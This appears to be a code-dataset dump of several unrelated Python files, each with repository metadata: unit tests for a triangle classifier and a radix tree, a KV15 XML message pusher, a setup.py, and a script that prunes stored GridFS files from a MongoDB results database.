        self.failUnless( notify_data[0] == 1 )
def create_suite():
    """Assemble a unittest suite containing every test of tester_t."""
    tests = unittest.makeSuite(tester_t)
    suite = unittest.TestSuite()
    suite.addTest(tests)
    return suite
def run_suite():
    # Verbosity 2 prints each test name as it runs.
    unittest.TextTestRunner(verbosity=2).run( create_suite() )
if __name__ == "__main__":
    run_suite()
UTF-8
Python
false
false
2,010
15,350,213,132,505
bd3f846a51bf1c46eaec913cd7ebc30ca017236a
66fcdc7a97ad8979c8fddddf8a7d5ce0727bc486
/src/test.py
72bb5b157e814a3f3f6edaaa238ec4342b54c030
[
"MIT"
]
permissive
rflynn/radixtree
https://github.com/rflynn/radixtree
f61a4c74a7c7ba9704e5d539361b177b18d12273
398b71157e83e994c59fa88bcabfd8ebcac52017
refs/heads/master
2016-09-05T19:28:17.076752
2014-03-08T22:32:18
2014-03-08T22:32:18
3,547,109
1
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# ex: set ts=4 et:
from radixtree import RadixTree, URLTree
# Run the self-test suites bundled with each tree class (their behaviour on
# failure is defined inside the radixtree module).
RadixTree.test()
URLTree.test()
UTF-8
Python
false
false
2,014
13,099,650,268,405
bc115d46c27758e706498234519b250073c8c303
65ac1849fad78cc8effe46bf3aa6df0a8fb39058
/triangle/test.py
22dbd69a2be2264f9290439b7232db26c3e29638
[]
no_license
thylm55/ktpm2013
https://github.com/thylm55/ktpm2013
97d827ffcadc1acb770dba4e14caf5e5e76785ce
f7ea72368c4e8c2bd30681dff71766987ee75d1c
refs/heads/master
2016-09-06T11:04:47.768403
2013-10-19T17:30:06
2013-10-19T17:30:06
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# Exact classification strings detect_triangle is expected to return; the
# test cases compare against these values verbatim.
OUTPUT01 = 'equilateral triangle'
OUTPUT02 = 'isosceles right triangle'
OUTPUT03 = 'right triangle'
OUTPUT04 = 'isosceles triangle'
OUTPUT05 = 'triangle'
OUTPUT06 = 'not identified'
import unittest
import math
from triangle import detect_triangle
class TriangleTest(unittest.TestCase):
    """Classification and input-validation tests for detect_triangle.

    Fix: the original defined ``test04d`` twice with identical bodies; the
    second definition shadowed the first, so only one ran. The duplicate is
    renamed ``test04e`` so both are collected.
    """

    # --- classification: equilateral triangle ---
    def test01a(self):
        self.assertEqual(detect_triangle(3, 3, 3), OUTPUT01)

    def test01b(self):
        # Large integer sides.
        self.assertEqual(detect_triangle(2**32-1, 2**32-1, 2**32-1), OUTPUT01)

    def test01c(self):
        # Very small float sides.
        self.assertEqual(detect_triangle(1e-30, 1e-30, 1e-30), OUTPUT01)

    # --- isosceles right triangle (legs a == b, hypotenuse sqrt(2)*a) ---
    def test02a(self):
        self.assertEqual(detect_triangle(2, 2, math.sqrt(8)), OUTPUT02)

    def test02b(self):
        self.assertEqual(detect_triangle(3, 3, math.sqrt(18)), OUTPUT02)

    def test02c(self):
        self.assertEqual(detect_triangle(4, 4, math.sqrt(32)), OUTPUT02)

    def test02d(self):
        self.assertEqual(detect_triangle(7, 7, math.sqrt(98)), OUTPUT02)

    # --- right triangle ---
    def test03a(self):
        self.assertEqual(detect_triangle(3, 4, 5), OUTPUT03)

    def test03b(self):
        self.assertEqual(detect_triangle(6, 5, math.sqrt(61)), OUTPUT03)

    # --- isosceles triangle ---
    def test04a(self):
        self.assertEqual(detect_triangle(7, 7, 5), OUTPUT04)

    def test04b(self):
        self.assertEqual(detect_triangle(2**32-1, 2**32-1, 4), OUTPUT04)

    def test04c(self):
        self.assertEqual(detect_triangle(2**32-1, 2**32-1, 2**32-2), OUTPUT04)

    def test04d(self):
        self.assertEqual(detect_triangle(2**32-1, 4, 2**32-1), OUTPUT04)

    def test04e(self):
        # Was a duplicate `test04d` in the original; renamed so it runs.
        self.assertEqual(detect_triangle(2**32-1, 4, 2**32-1), OUTPUT04)

    # --- generic (scalene) triangle ---
    def test05a(self):
        self.assertEqual(detect_triangle(2, 3, 4), OUTPUT05)

    def test05b(self):
        self.assertEqual(detect_triangle(2**32-1, 2**32-2, 2**32-3), OUTPUT05)

    def test05c(self):
        self.assertEqual(detect_triangle(2**32-1, 2**32-2, 3), OUTPUT05)

    # --- degenerate: fails the strict triangle inequality ---
    def test06a(self):
        self.assertEqual(detect_triangle(1, 2, 3), OUTPUT06)

    # --- input validation: negative sides ---
    def test07a(self):
        self.assertEqual(detect_triangle(-2, 3, 4), OUTPUT06)

    def test07b(self):
        self.assertEqual(detect_triangle(2, -3, 4), OUTPUT06)

    def test07c(self):
        self.assertEqual(detect_triangle(2, 3, -4), OUTPUT06)

    # --- input validation: non-numeric sides ---
    def test08a(self):
        self.assertEqual(detect_triangle("a", 3, 4), OUTPUT06)

    def test08b(self):
        self.assertEqual(detect_triangle(2, "math.sqrt(2)", 4), OUTPUT06)

    def test08c(self):
        self.assertEqual(detect_triangle(2, 3, "2**32-1"), OUTPUT06)

    # --- input validation: missing arguments ---
    def test09a(self):
        self.assertEqual(detect_triangle(), OUTPUT06)

    def test09b(self):
        self.assertEqual(detect_triangle(2), OUTPUT06)

    def test09c(self):
        self.assertEqual(detect_triangle(2, 3), OUTPUT06)

    # --- input validation: zero-length sides ---
    def test10a(self):
        self.assertEqual(detect_triangle(0, 0, 0), OUTPUT06)

    def test10b(self):
        self.assertEqual(detect_triangle(0, 3, 4), OUTPUT06)

    def test10c(self):
        self.assertEqual(detect_triangle(2, 0, 4), OUTPUT06)

    def test10d(self):
        self.assertEqual(detect_triangle(2, 3, 0), OUTPUT06)

# run test
if __name__ == '__main__':
    unittest.main()
UTF-8
Python
false
false
2,013
19,670,950,233,002
0ce4b762cba8c0ef8a7780daa575967c655eb588
119efda3f0af227958aa9b14e7ea1687453cdf10
/kv15/kv15messages.py
04f2c35e035bc97d234b91858f87473f4131d53b
[]
no_license
sven4all/openebs
https://github.com/sven4all/openebs
9c48fec296973df6f70ccd94259d09c629c69558
f0abbda96b83cb71f323aceaec777a95c01d09f8
refs/heads/master
2021-01-17T21:47:54.863980
2012-12-10T01:16:41
2012-12-10T01:16:41
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from io.push import Push
class KV15messages:
    """Container for KV15 stop messages, serialisable to a TMI8 XML fragment."""

    def __init__(self, stopmessages = None):
        # Fresh list per instance — never share a mutable default.
        self.stopmessages = [] if stopmessages is None else stopmessages

    def __str__(self):
        """Render the wrapper element with each stop message serialised inside."""
        parts = [""" <KV15messages>\n"""]
        parts.extend(str(message) for message in self.stopmessages)
        parts.append(""" </KV15messages>""")
        return "".join(parts)

    def push(self, remote, path):
        """Deliver the serialised messages to `remote` at `path` via Push."""
        payload = Push(dossiername='KV15messages', content = str(self), namespace='http://bison.connekt.nl/tmi8/kv15/msg')
        return payload.push(remote, path)
UTF-8
Python
false
false
2,012
15,453,292,358,713
fe0087481c31804abcdacecfb9846e35607f1760
3967090c44cba1a77dd573ac1b16566ccbdfc5d7
/utilities/prunefiles.py
09cdd6ac92c66e41827f2c946bbfd73fac6c4dcc
[]
no_license
cgperschon/slickqa
https://github.com/cgperschon/slickqa
c0e79656b4352140b4ef6a31bc32415a4352b94f
6eae7361da4a95ab22377edf9d1349295d248982
refs/heads/master
2021-01-01T17:15:56.475399
2014-02-05T19:49:34
2014-02-05T19:49:34
35,633,779
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#!/usr/bin/env python
__author__ = 'jcorbett'
import argparse
import pymongo
import sys
from gridfs import GridFS
def main(arguments):
    """Delete stored GridFS files from every result of one project release."""
    parser = argparse.ArgumentParser(description='Remove files from a set of results.')
    parser.add_argument("-p", "--project", dest="project", required=True, help="The project to prune files from")
    parser.add_argument("-r", "--release", dest="release", required=True, help="The release of the project to prune files from.")
    options = parser.parse_args(args=arguments)
    connection = pymongo.Connection()
    db = connection['slickij']
    gridfs = GridFS(db)
    project = db.projects.find_one({'name': options.project})
    if project is None:
        print "There is no project with the name", options.project
        sys.exit(1)
    release = None
    # for/else: the else branch runs only when no release matched (no break).
    for possible in project['releases']:
        if possible['name'] == options.release:
            release = possible
            break
    else:
        print "There is no release with the name", options.release
        sys.exit(1)
    number_of_results = db.results.find({'release.releaseId': release['id']}).count()
    print "There are", number_of_results, "results in that release."
    resultnum = 0
    for result in db.results.find({'release.releaseId': release['id']}):
        # Percentage progress indicator, overwritten in place via \r.
        sys.stdout.write("{:.2f}%\r".format(((float(resultnum) / number_of_results) * 100)))
        sys.stdout.flush()
        resultnum += 1
        if 'files' in result:
            for fileref in result['files']:
                # NOTE(review): `fileobj` is fetched but never used.
                fileobj = db[fileref.collection].find_one(fileref.id)
                gridfs.delete(fileref.id)
    print "Done Removing files from", number_of_results, "results."
    print "Removing file references from the results."
    # NOTE(review): the $unset field name is empty ("") — this looks like a
    # bug; presumably it should unset "files". Confirm before relying on it.
    db.results.update({'release.releaseId': release['id']}, {"$unset": {"": 1}}, False, True)
    print "Done."
if __name__ == '__main__':
    main(sys.argv[1:])
import os
from setuptools import setup
# Utility function to read the README file.
# Used for the long_description. It's nice, because now 1) we have a top level
# README file and 2) it's easier to type in the README file than to put a raw
# string in below ...
def read(fname):
    """Return the contents of *fname*, resolved relative to this file.

    Used to feed README into setup()'s long_description. Fix: the original
    left the file handle open; a context manager closes it deterministically.
    """
    with open(os.path.join(os.path.dirname(__file__), fname)) as f:
        return f.read()
# Package metadata for django-file-repository.
# NOTE(review): several classifier strings below do not match the official
# PyPI trove-classifier list (e.g. "Development Status :: 4 - Beta/Testing",
# "Framework :: Django 1.4.5", the "Dependencies ::" namespace) — uploads to
# PyPI validate classifiers, so these would likely be rejected; confirm.
setup(
    name = "django-file-repository",
    version = "0.2b",
    author = "Oscar Carballal Prego",
    author_email = "[email protected]",
    description = ("Simple file repository with public/private files, tags and categories."),
    license = "GPLv3",
    keywords = "repository tagging categorization file",
    url = "http://github.com/cidadania/django-file-repository",
    packages=['repository'],
    long_description=read('README'),
    classifiers=[
        "Development Status :: 4 - Beta/Testing",
        "Topic :: Web Utilities",
        "Framework :: Django 1.4.5",
        "License :: OSI Approved :: GPLv3 License",
        "Operating System :: OS Independent",
        "Natural Language :: English",
        "Natural Language :: Spanish",
        "Dependencies :: django-registration, django-taggit",
        "Intended Audience :: Everyone",
    ],
)
UTF-8
Python
false
false
2,014
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.